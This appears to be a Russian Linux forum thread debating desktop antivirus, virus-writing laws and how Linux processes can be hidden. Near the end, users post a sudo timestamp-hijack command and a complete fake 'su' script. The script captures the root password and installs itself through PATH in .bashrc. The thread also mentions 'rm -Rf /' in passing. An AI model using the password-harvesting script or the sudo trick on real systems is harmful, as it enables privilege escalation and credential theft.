Нужен ли антивирус на десктопе? (Вслед за фаером и антивирус.)

[Flaming]

Конечно, вариант с "сами пишем, сами обезвреживаем" получше будет, но тоже уж очень оторван от реальности.

Почему? Что вы в нём видите нереального?
По мне так наоборот, гораздо проще написать антивирусную базу для свеженаписанного вируса тем же человеком, чем гулять по сети и выискивать неизвестные вирусы. Ну, или ждать присланные от пользователей карантины какие-нить...

[drBatty]

rm -Rf /

И что, хотите сказать, сервер под фрей будет заражен таким вирусом?

прецедентов не было?

Честно говоря, производители антивирусов с другими производителями антивирусов сговориться не могут, не говоря уж о том, чтоб эффективно сговариваться с вирусописателями. Да и к тому же в этом нет смысла. Конечно, вариант с "сами пишем, сами обезвреживаем" получше будет, но тоже уж очень оторван от реальности.

договорится не могут.
потому появляются вирусы, которые ловятся только определённым антивирусом. но ловятся! как будто, антивирусы тоже бывают совместимы с вирусами, как и остальное ПО которое идёт в комплексе. Ну к примеру gcc и ld. есть компилятор, есть линковщик к нему. ИМХО они делаются если и разными людьми, то не слишком разными.

в конце концов кто-то же вирусы пишет? я тут видел прикольный троянчек, который требует послать СМС. красивенький такой... грозился завалить всю систему(я думал - и вправду сотрёт/зашифрует, нет, обошлось. впрочем там и не было ничего ценного)
вот глядя на этот вирус, мне показалось, что автор - не студент-очкарик, которому папа вчера купил компьютер

[Bluetooth]

rm -Rf /

И что, хотите сказать, сервер под фрей будет заражен таким вирусом?

прецедентов не было?

Честно говоря, производители антивирусов с другими производителями антивирусов сговориться не могут, не говоря уж о том, чтоб эффективно сговариваться с вирусописателями. Да и к тому же в этом нет смысла. Конечно, вариант с "сами пишем, сами обезвреживаем" получше будет, но тоже уж очень оторван от реальности.

договорится не могут.
потому появляются вирусы, которые ловятся только определённым антивирусом. но ловятся! как будто, антивирусы тоже бывают совместимы с вирусами, как и остальное ПО которое идёт в комплексе. Ну к примеру gcc и ld. есть компилятор, есть линковщик к нему. ИМХО они делаются если и разными людьми, то не слишком разными.

в конце концов кто-то же вирусы пишет? я тут видел прикольный троянчек, который требует послать СМС. красивенький такой... грозился завалить всю систему(я думал - и вправду сотрёт/зашифрует, нет, обошлось. впрочем там и не было ничего ценного)
вот глядя на этот вирус, мне показалось, что автор - не студент-очкарик, которому папа вчера купил компьютер

ПО-моему троянчег, требующий отослать смс - топорная поделка, которую можно обойти даже без использования антивируса или лайв сиди. Он только в энной версии действительно научился нормально блокировать систему.
А насчет теории заговора - такие теории, конечно, интересные, но, к сожалению, оторваны от реальности. Это же относится и к данной теории

[Flaming]

А насчет теории заговора - такие теории, конечно, интересные, но, к сожалению, оторваны от реальности. Это же относится и к данной теории

Вы опять свои слова ничем не подтвердили. Как и в прошлый раз. Пруфлинк, пожалуйста.
Я пруфлинка, к сожалению, тоже не дал, но написал какое-никакое логическое обоснование.

[/dev/random]

Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.

[Bluetooth]

А насчет теории заговора - такие теории, конечно, интересные, но, к сожалению, оторваны от реальности. Это же относится и к данной теории

Вы опять свои слова ничем не подтвердили. Как и в прошлый раз. Пруфлинк, пожалуйста.
Я пруфлинка, к сожалению, тоже не дал, но написал какое-никакое логическое обоснование.

Пруфлинк для опровержения теории заговора? смешно.
А Ваши логические объяснения ничуть не лучше моих соображений, которые я тоже высказал

Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.

Тож как-то оторванно от реальности. А зачем Васе тогда распространять этот вирус? В лабу касперского он уже отослан, бабло антивирус получен. Или у Васи все-же другие мотивы?
И много ли таких Вась, которые могут(и будут) писать вирус ради какой-то фигни? Думаю, таких почти нет.

[drBatty]

Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.

нет такой практики. кстати, "Вася Пупкин" может реально сесть на нары сроком до 6(шести) лет.

[Bluetooth]

Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.

нет такой практики. кстати, "Вася Пупкин" может реально сесть на нары сроком до 6(шести) лет.

За именно написание вредоносного ПО? даже если он не распространял его?

[/dev/random]

нет такой практики.

Проверил - действительно, на официальном сайте не написано. Может быть, сейчас такой практики и нет. Но я лично знаю человека, которому за образец вируса (разумеется, не им написанного) выслали лицензионный ключ KAV.

[Bluetooth]

нет такой практики.

Но я лично знаю человека, которому за образец вируса (разумеется, не им написанного) выслали лицензионный ключ KAV.

Но это ж не значит, что кто-то станет ради такой фигни, как антивирь, писать вирус, чтоб его тут же отдать.

[Janik]

Думаю, антивирь на Лиуксе не нужен! И так достаточно безопасная ОСь (если, конечно, работать не под root'ом)!

[drBatty]

За именно написание вредоносного ПО? даже если он не распространял его?

компьютерный вирус - программа, с встроенной функцией распространения.
как-бы само написание уже подразумевает распространение.

Статья 183. Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну

1. Собирание сведений, составляющих коммерческую, налоговую или банковскую тайну, путем похищения документов, подкупа или угроз, а равно иным незаконным способом -
наказывается штрафом в размере до восьмидесяти тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного до шести месяцев либо лишением свободы на срок до двух лет.
2. Незаконные разглашение или использование сведений, составляющих коммерческую, налоговую или банковскую тайну, без согласия их владельца лицом, которому она была доверена или стала известна по службе или работе, -
наказываются штрафом в размере до ста двадцати тысяч рублей или в размере заработной платы или иного дохода осужденного за период до одного года с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет либо лишением свободы на срок до трех лет.
3. Те же деяния, причинившие крупный ущерб или совершенные из корыстной заинтересованности, -
наказываются штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет либо лишением свободы на срок до пяти лет.
4. Деяния, предусмотренные частями второй или третьей настоящей статьи, повлекшие тяжкие последствия, -
наказываются лишением свободы на срок до десяти лет.

вполне можно приписать...
вот ещё

Статья 272. Неправомерный доступ к компьютерной информации

1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, -

наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.

вирус под это вполне подойдёт.
правда доказать авторство не удастся. наверное...

1)Думаю, антивирь на Лиуксе не нужен!
2)И так достаточно безопасная ОСь (если, конечно, работать не под root'ом)!

1)согласен.
2)к сожалению вы глубоко заблуждаетесь. даже если не работать под рутом.

[Janik]

2)к сожалению вы глубоко заблуждаетесь. даже если не работать под рутом.

Не против!

[drBatty]

ну вот что вика выдала: http://ru.wikipedia.org/wiki/Rootkit
ИМХО в этой статье всё верно, для ознакомления с вопросом достаточно...

Но я лично знаю человека, которому за образец вируса (разумеется, не им написанного) выслали лицензионный ключ KAV.

а как он нашёл этот вирус?
как вообще вирусы находят?

[watashiwa_daredeska]

компьютерный вирус - программа, с встроенной функцией распространения.

Телевизор -- прибор со встроенной функцией приема телесигнала и просмотра телепередач. Но это совсем не означает, что я этим пользуюсь, даже если кабель заведен в квартиру. Основное назначение телевизора у меня -- работать монитором.

как-бы само написание уже подразумевает распространение.

Не подразумевает. Как создание веб-сайта/веб-приложения отнюдь не подразумевает его обязательной публикации. Это может быть учебный/исследовательский проект.

Статья 183.

вполне можно приписать...

Статья 272.

вирус под это вполне подойдёт.

Нельзя приписать и не подойдет. Эти статьи сами по себе с вирусами связаны примерно также, как хранение оружия и статьи за умышленное убийство.

[drBatty]

Не подразумевает. Как создание веб-сайта/веб-приложения отнюдь не подразумевает его обязательной публикации. Это может быть учебный/исследовательский проект.

смотря что называть вирусом...
если - вредоносное по

Нельзя приписать и не подойдет. Эти статьи сами по себе с вирусами связаны примерно также, как хранение оружия и статьи за умышленное убийство.

эти - да
а эта?

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами -
наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок от трех до семи лет.

ЗЫЖ тут кстати не сказано, что нужно знать о том, что у вас есть вредоносное ПО, как с наркотиками - если у вас их нашли, и вы не сможете доказать что это не лекарство нужное именно вам(рецепт тут наверное единственное доказательство), то вас осудят...
ЗЗЫЖ с наркотиками проще, на них можно рецепт получить, на оружие - тоже разрешение можно получить, а вот вирус...

[watashiwa_daredeska]

а эта?

Очень размытая формулировка. Есть подозрение, что некоторые слова повседневной лексики имеют какой-то особый юридический смысл. Иначе, по этой статье надо сажать всю Лабораторию Касперского в полном составе за "использование ... таких программ или машинных носителей с такими программами". Или у ЛК подразделение, непосредственно занимающееся вирусами, базируется в Уганде?

[watashiwa_daredeska]

если у вас их нашли, и вы не сможете доказать что это не лекарство нужное именно вам(рецепт тут наверное единственное доказательство), то вас осудят...

Вообще-то, по хорошему, если у меня нашли наркотики, то нужно еще доказать, что я имею к ним отношение и они не забыты предыдущим жильцом на съемной квартире или предыдущим клиентом в арендованной машине или еще чего похуже и со злым умыслом. А с вирусом, по самой его природе, такие подставы -- типовая ситуация. Если бы можно было просто за найденный вирус сажать, это уже давно было бы основным инструментом давления, ибо подавляющее большинство машин либо заражено, либо пассивно хранит вирусы (в кэше браузера, в почте, ...).

[drBatty]

всю Лабораторию Касперского в полном составе за "использование ..

мало-ли у нас противоречивых законов?

закон - что дышло, куда повернёшь, туда и вышло...

не я придумал пословицу, и не вчера
а подставы тоже бывают. думаю всё проще: наркотики легче подбросить, причём так, что доказать можно было. я вот не юрист(к сожалению), но надо ещё посмотреть, а является ли HDD с вашего компа доказательством? наркотики или оружие постовой может изъять. а вот hdd, да ещё с понятыми... но УЖЕ есть примеры давления, с помощью варезного ПО(оно сейчас в 99% российских компов). вот тут девушка попала(кстати на наркоте), и по совокупности ещё и продажу вареза добавили... пользуясь кстати юридической безграмотностью обвиняемой
Потому законы надо знать, что-бы у следствия было меньше вопросов(от сумы, да от тюрьмы...).
и не рассылать вредоносный код неведомо куда...
и использовать ПО не надо непонятно откуда
и не использовать варез, он постоянно с заразой.

[drBatty]

ибо подавляющее большинство машин либо заражено, либо пассивно хранит вирусы (в кэше браузера, в почте, ...).

ну бинарный файл который и не запустить думаю не пришьют - у меня вот есть такое в кеше, но я спокоен - у меня нет ПО, среды для работы. это мусор в моей системе, не файлы даже, обрывки.
а через wine большинство вирусов не работают, т.к. используют "чёрные ходы", и дыры, которых в wine просто нет. в ОС вообще нет и не должно быть легального и документированного средства размножения и тайного запуска ПО. а уж модификация одним ПО другим, да ещё и скрытно... конечно возможно, но - нелегально.

[neudachnik]

Вот conky показывает запущенные процессы.А вы не знаете,сможет conky показать работу "чужой" программы,например трояна какого-нибудь ?

[Bluetooth]

Вот conky показывает запущенные процессы.А вы не знаете,сможет conky показать работу "чужой" программы,например трояна какого-нибудь ?

Может, равно как и любая другая подобная утилита. Только любой вменяемый троян - замаскирован, и его не увидишь просто так.

[Davinel]

Может, равно как и любая другая подобная утилита. Только любой вменяемый троян - замаскирован, и его не увидишь просто так.

А возможно ли это, кстати? Не интересовался, но.. каким образом в линуксе можно спятать процесс?
Можно конечно его назвать как нибудь так, чтоб он не вызывал подозрений, но это немного не то..

[/dev/random]

А возможно ли это, кстати? Не интересовался, но.. каким образом в линуксе можно спятать процесс?
Можно конечно его назвать как нибудь так, чтоб он не вызывал подозрений, но это немного не то..

Рут - может. Информация о процессах берётся из файловой системы /proc, так что достаточно подмонтировать на её место фальшивку. Скрыть факт подмонтирования фальшивки гораздо сложнее, но тоже возможно. А ещё можно пропатчить ядро или glibc (через которую производятся все обращения к ядру).

Другое дело, что для этого нужно ещё получить права рута, а это весьма сложно (кроме дефолтной убунты, с её беспарольным судо)

[drag0n]

кроме дефолтной убунты, с её беспарольным судо

sudo не спрашивает пароля только на LiveCD, чтобы начинающие пользователи не удивлялись, где взять пароль. На установленной системе sudo уже спрашивает пароль.

[watashiwa_daredeska]

На установленной системе sudo уже спрашивает пароль.

И следующие 5 минут уже не спрашивает. Достаточно повесить процесс с правами пользователя, который будет с определенным интервалом дергать sudo.

[Rootlexx]

И следующие 5 минут уже не спрашивает. Достаточно повесить процесс с правами пользователя, который будет с определенным интервалом дергать sudo.

Недостаточно. Сохранение пароля ограничивается одним устройством терминала (tty) или псевдотерминала (pts). То есть если, к примеру, открыть «Терминал», набрать там «sudo whoami», то сначала, понятно, потребуется ввести пароль. Если эту команду немедленно повторить, пароль уже вводить не нужно будет. Но если открыть новую вкладку или окно, где будет запущен новый экземпляр оболочки, то пароль ввести придётся несмотря на то, что прошло явно меньше пяти минут.

[watashiwa_daredeska]

Недостаточно.

user@localhost

user@localhost$ tty /dev/pts/1 user@localhost$ sudo ls [sudo] password for user: test1 test2 test3 user@localhost$ sudo ls test1 test2 test3

user@localhost

user@localhost$ tty /dev/pts/2 user@localhost$ sudo ls [sudo] password for user: ^C user@localhost$ SUDO_ASKPASS=/bin/true sudo -A ls </dev/pts/1 2>&0 test1 test2 test3

[Rootlexx]

watashiwa_darede...
Да, есть такое. Согласен, что это нехорошо, хотя настраивается, разумеется.
Тем не менее, это не отменяет факта, что сначала необходимо получить доступ к выполнению команд. А это уже позволяет скомпрометировать систему безо всяких sudo:

Код: Выделить всё

alexey@desktop:~$ cat > /tmp/.hidden/su
#!/bin/bash

SUCCEED_FILE=/tmp/.succeed;
if [ -f "$SUCCEED_FILE" ]; then
    /bin/su "$@"; else
    printf "Password: ";
    stty -echo;
    read pass;
    stty echo;
    printf "\n";
    sleep 3s;
    printf "su: autentification failure\n";
    printf "root password: \"%s\"\n" "$pass" > /tmp/.root_pass;
    touch "$SUCCEED_FILE";
fi
alexey@desktop:~$ chmod a+x /tmp/.hidden/su
alexey@desktop:~$ printf "export PATH=\"/tmp/.hidden:\$PATH\"\n" >> .bashrc
alexey@desktop:~$

Новая оболочка:

Код: Выделить всё

alexey@desktop:~$ su -c whoami
Password:
su: autentification failure
alexey@desktop:~$ # Ой, кажется, не ту педаль нажал. Ну-ка ещё раз...
alexey@desktop:~$ su -c whoami
Password:
root
alexey@desktop:~$ # Всё отлично.

А ночью :

Код: Выделить всё

alexey@desktop:~$ cat /tmp/.root_pass
root password: "Here is the password"
alexey@desktop:~$

Да, способ банальнейший, но в большинстве случаев сработает. Разумеется, можно придумать и что-нибудь более скрытное.

[watashiwa_daredeska]

способ банальнейший, но в большинстве случаев сработает.

Нет, не сработает. Времена изменились, вручную из консольки команды запускает уже меньшинство. У большинства программы сами спрашивают пароль для подтверждения перехода в привилегированный режим (aptitude, например, всякие гуёвые конфигурялки в убунте и пр.). Всякие su и sudo запускаются по полному пути в этом случае.